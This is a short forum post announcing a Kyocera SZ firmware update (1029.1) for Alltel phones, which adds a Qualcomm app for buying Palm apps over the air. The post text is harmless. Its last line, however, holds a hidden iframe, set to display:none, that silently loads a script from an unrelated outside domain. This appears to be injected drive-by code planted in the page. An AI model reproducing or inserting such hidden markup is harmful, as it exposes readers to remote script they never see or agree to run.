Sorry for my absence -- I've been VERY preoccupied over the past few months. Although I'm happy to say that the "preoccupation" has been ALL GOOD!

Anyway, I just wanted everyone to know about a MINOR SZ firmware upgrade from Kyocera which was released about a month ago to Alltel.

SZ 1029.1 is the same as 1029, with ONE exception. It includes a Qualcomm app which allows users to purchase Palm apps over the air. Since AxcessShop connects to a BREW download server, it MIGHT be compatible with VZW since they use the same server.

Anyway, I thought you kids might be curious ... and it does seem that Kyocera HAS NOT stopped with the firware upgrades.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
